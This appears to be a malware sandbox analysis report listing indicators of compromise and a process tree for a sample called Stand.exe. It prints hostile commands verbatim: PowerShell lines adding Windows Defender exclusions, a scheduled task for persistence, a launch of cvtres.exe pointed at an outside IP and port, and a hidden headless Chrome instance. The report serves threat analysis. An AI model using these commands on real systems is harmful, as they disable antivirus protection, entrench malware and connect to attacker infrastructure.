Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeStand.exepowershell.exechrome.exe

pid	process
1756	powershell.exe
1168	powershell.exe
896	powershell.exe
1572	powershell.exe
2936	Stand.exe
2936	Stand.exe
2936	Stand.exe
2936	Stand.exe
2936	Stand.exe
2936	Stand.exe
2936	Stand.exe
2936	Stand.exe
2936	Stand.exe
2936	Stand.exe
2936	Stand.exe
2636	powershell.exe
1012	chrome.exe
1012	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

chrome.exe

pid process

1012 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Stand.exeStand.exeStand.exepowershell.exeStand.exepowershell.exeStand.exepowershell.exeStand.exepowershell.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exeStand.exe

description	pid	process
Token: SeDebugPrivilege	2936	Stand.exe
Token: SeDebugPrivilege	1360	Stand.exe
Token: SeDebugPrivilege	2420	Stand.exe
Token: SeDebugPrivilege	1756	powershell.exe
Token: SeDebugPrivilege	576	Stand.exe
Token: SeDebugPrivilege	1168	powershell.exe
Token: SeDebugPrivilege	2124	Stand.exe
Token: SeDebugPrivilege	896	powershell.exe
Token: SeDebugPrivilege	2592	Stand.exe
Token: SeDebugPrivilege	1572	powershell.exe
Token: SeDebugPrivilege	860	Stand.exe
Token: SeDebugPrivilege	2936	Stand.exe
Token: SeDebugPrivilege	2384	Stand.exe
Token: SeDebugPrivilege	804	Stand.exe
Token: SeDebugPrivilege	1152	Stand.exe
Token: SeDebugPrivilege	1620	Stand.exe
Token: SeDebugPrivilege	596	Stand.exe
Token: SeDebugPrivilege	2684	Stand.exe
Token: SeDebugPrivilege	1608	Stand.exe
Token: SeDebugPrivilege	2300	Stand.exe
Token: SeDebugPrivilege	2216	Stand.exe
Token: SeDebugPrivilege	696	Stand.exe
Token: SeDebugPrivilege	2364	Stand.exe
Token: SeDebugPrivilege	1632	Stand.exe
Token: SeDebugPrivilege	2116	Stand.exe
Token: SeDebugPrivilege	1616	Stand.exe
Token: SeDebugPrivilege	2404	Stand.exe
Token: SeDebugPrivilege	2780	Stand.exe
Token: SeDebugPrivilege	1504	Stand.exe
Token: SeDebugPrivilege	1620	Stand.exe
Token: SeDebugPrivilege	3036	Stand.exe
Token: SeDebugPrivilege	1912	Stand.exe
Token: SeDebugPrivilege	2384	Stand.exe
Token: SeDebugPrivilege	476	Stand.exe
Token: SeDebugPrivilege	2984	Stand.exe
Token: SeDebugPrivilege	2964	Stand.exe
Token: SeDebugPrivilege	2524	Stand.exe
Token: SeDebugPrivilege	1100	Stand.exe
Token: SeDebugPrivilege	1384	Stand.exe
Token: SeDebugPrivilege	2288	Stand.exe
Token: SeDebugPrivilege	1296	Stand.exe
Token: SeDebugPrivilege	1536	Stand.exe
Token: SeDebugPrivilege	2512	Stand.exe
Token: SeDebugPrivilege	1572	Stand.exe
Token: SeDebugPrivilege	2608	Stand.exe
Token: SeDebugPrivilege	2904	Stand.exe
Token: SeDebugPrivilege	2648	Stand.exe
Token: SeDebugPrivilege	2212	Stand.exe
Token: SeDebugPrivilege	2168	Stand.exe
Token: SeDebugPrivilege	2056	Stand.exe
Token: SeDebugPrivilege	1648	Stand.exe
Token: SeDebugPrivilege	1716	Stand.exe
Token: SeDebugPrivilege	2420	Stand.exe
Token: SeDebugPrivilege	1996	Stand.exe
Token: SeDebugPrivilege	560	Stand.exe
Token: SeDebugPrivilege	2888	Stand.exe
Token: SeDebugPrivilege	2652	Stand.exe
Token: SeDebugPrivilege	2308	Stand.exe
Token: SeDebugPrivilege	632	Stand.exe
Token: SeDebugPrivilege	708	Stand.exe
Token: SeDebugPrivilege	2724	Stand.exe
Token: SeDebugPrivilege	1944	Stand.exe
Token: SeDebugPrivilege	2780	Stand.exe
Token: SeDebugPrivilege	2596	Stand.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exe

pid	process
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe
1012	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Stand.exe

pid process

2936 Stand.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

StandLaunchpad.exemshta.exeStandLaunchpad.exemshta.exeStand.exeStandLaunchpad.exemshta.exeStandLaunchpad.exemshta.exe

description	pid	process	target process
PID 2364 wrote to memory of 2936	2364	StandLaunchpad.exe	Stand.exe
PID 2364 wrote to memory of 2936	2364	StandLaunchpad.exe	Stand.exe
PID 2364 wrote to memory of 2936	2364	StandLaunchpad.exe	Stand.exe
PID 2364 wrote to memory of 2576	2364	StandLaunchpad.exe	mshta.exe
PID 2364 wrote to memory of 2576	2364	StandLaunchpad.exe	mshta.exe
PID 2364 wrote to memory of 2576	2364	StandLaunchpad.exe	mshta.exe
PID 2364 wrote to memory of 2576	2364	StandLaunchpad.exe	mshta.exe
PID 2576 wrote to memory of 2636	2576	mshta.exe	bitsadmin.exe
PID 2576 wrote to memory of 2636	2576	mshta.exe	bitsadmin.exe
PID 2576 wrote to memory of 2636	2576	mshta.exe	bitsadmin.exe
PID 2576 wrote to memory of 2636	2576	mshta.exe	bitsadmin.exe
PID 2576 wrote to memory of 1736	2576	mshta.exe	StandLaunchpad.exe
PID 2576 wrote to memory of 1736	2576	mshta.exe	StandLaunchpad.exe
PID 2576 wrote to memory of 1736	2576	mshta.exe	StandLaunchpad.exe
PID 2576 wrote to memory of 1736	2576	mshta.exe	StandLaunchpad.exe
PID 1736 wrote to memory of 1360	1736	StandLaunchpad.exe	Stand.exe
PID 1736 wrote to memory of 1360	1736	StandLaunchpad.exe	Stand.exe
PID 1736 wrote to memory of 1360	1736	StandLaunchpad.exe	Stand.exe
PID 1736 wrote to memory of 2532	1736	StandLaunchpad.exe	mshta.exe
PID 1736 wrote to memory of 2532	1736	StandLaunchpad.exe	mshta.exe
PID 1736 wrote to memory of 2532	1736	StandLaunchpad.exe	mshta.exe
PID 1736 wrote to memory of 2532	1736	StandLaunchpad.exe	mshta.exe
PID 2532 wrote to memory of 1032	2532	mshta.exe	bitsadmin.exe
PID 2532 wrote to memory of 1032	2532	mshta.exe	bitsadmin.exe
PID 2532 wrote to memory of 1032	2532	mshta.exe	bitsadmin.exe
PID 2532 wrote to memory of 1032	2532	mshta.exe	bitsadmin.exe
PID 2936 wrote to memory of 1756	2936	Stand.exe	powershell.exe
PID 2936 wrote to memory of 1756	2936	Stand.exe	powershell.exe
PID 2936 wrote to memory of 1756	2936	Stand.exe	powershell.exe
PID 2532 wrote to memory of 476	2532	mshta.exe	StandLaunchpad.exe
PID 2532 wrote to memory of 476	2532	mshta.exe	StandLaunchpad.exe
PID 2532 wrote to memory of 476	2532	mshta.exe	StandLaunchpad.exe
PID 2532 wrote to memory of 476	2532	mshta.exe	StandLaunchpad.exe
PID 476 wrote to memory of 2420	476	StandLaunchpad.exe	Stand.exe
PID 476 wrote to memory of 2420	476	StandLaunchpad.exe	Stand.exe
PID 476 wrote to memory of 2420	476	StandLaunchpad.exe	Stand.exe
PID 476 wrote to memory of 440	476	StandLaunchpad.exe	mshta.exe
PID 476 wrote to memory of 440	476	StandLaunchpad.exe	mshta.exe
PID 476 wrote to memory of 440	476	StandLaunchpad.exe	mshta.exe
PID 476 wrote to memory of 440	476	StandLaunchpad.exe	mshta.exe
PID 440 wrote to memory of 980	440	mshta.exe	conhost.exe
PID 440 wrote to memory of 980	440	mshta.exe	conhost.exe
PID 440 wrote to memory of 980	440	mshta.exe	conhost.exe
PID 440 wrote to memory of 980	440	mshta.exe	conhost.exe
PID 440 wrote to memory of 3068	440	mshta.exe	bitsadmin.exe
PID 440 wrote to memory of 3068	440	mshta.exe	bitsadmin.exe
PID 440 wrote to memory of 3068	440	mshta.exe	bitsadmin.exe
PID 440 wrote to memory of 3068	440	mshta.exe	bitsadmin.exe
PID 3068 wrote to memory of 576	3068	StandLaunchpad.exe	Stand.exe
PID 3068 wrote to memory of 576	3068	StandLaunchpad.exe	Stand.exe
PID 3068 wrote to memory of 576	3068	StandLaunchpad.exe	Stand.exe
PID 3068 wrote to memory of 2320	3068	StandLaunchpad.exe	mshta.exe
PID 3068 wrote to memory of 2320	3068	StandLaunchpad.exe	mshta.exe
PID 3068 wrote to memory of 2320	3068	StandLaunchpad.exe	mshta.exe
PID 3068 wrote to memory of 2320	3068	StandLaunchpad.exe	mshta.exe
PID 2936 wrote to memory of 1168	2936	Stand.exe	powershell.exe
PID 2936 wrote to memory of 1168	2936	Stand.exe	powershell.exe
PID 2936 wrote to memory of 1168	2936	Stand.exe	powershell.exe
PID 2320 wrote to memory of 1556	2320	mshta.exe	bitsadmin.exe
PID 2320 wrote to memory of 1556	2320	mshta.exe	bitsadmin.exe
PID 2320 wrote to memory of 1556	2320	mshta.exe	bitsadmin.exe
PID 2320 wrote to memory of 1556	2320	mshta.exe	bitsadmin.exe
PID 2320 wrote to memory of 2232	2320	mshta.exe	StandLaunchpad.exe
PID 2320 wrote to memory of 2232	2320	mshta.exe	StandLaunchpad.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
"C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2364
- C:\Users\Admin\AppData\Roaming\Stand.exe
  "C:\Users\Admin\AppData\Roaming\Stand.exe"
  2⤵
  - Modifies Installed Components in the registry
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Modifies Control Panel
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2936
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Stand.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1756
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1168
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Stand.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:896
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Stand.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1572
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Stand" /tr "C:\Users\Admin\AppData\Local\Temp\Stand.exe"
    3⤵
    - Creates scheduled task(s)
    PID:332
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 147.185.221.19 22671 <123456789> 938BA7708BC485929368
    3⤵
    PID:2532
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2636
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of FindShellTrayWindow
    PID:1012
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc4,0xc8,0xcc,0x98,0xd0,0x7fef2779758,0x7fef2779768,0x7fef2779778
      4⤵
      PID:1268
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1152 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:2
      4⤵
      PID:1888
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1416 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:3008
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1488 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:1916
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --display-capture-permissions-policy-allowed --first-renderer-process --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2160 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:1
      4⤵
      PID:2712
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2168 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:1
      4⤵
      PID:612
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2952 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:1
      4⤵
      PID:2052
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3496 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:1660
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3616 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:1068
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3736 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:1812
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3852 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:284
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3728 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:2464
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3660 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:1940
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3908 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:1696
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3652 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:2064
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4036 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:2776
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3684 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:1044
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3692 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:2632
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4016 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:4980
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=4060 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:4268
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3956 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:4704
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3680 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:5148
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3684 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:5408
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=3664 --field-trial-handle=1272,i,12740560183406526316,9189986416512500494,131072 /prefetch:8
      4⤵
      PID:5420
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
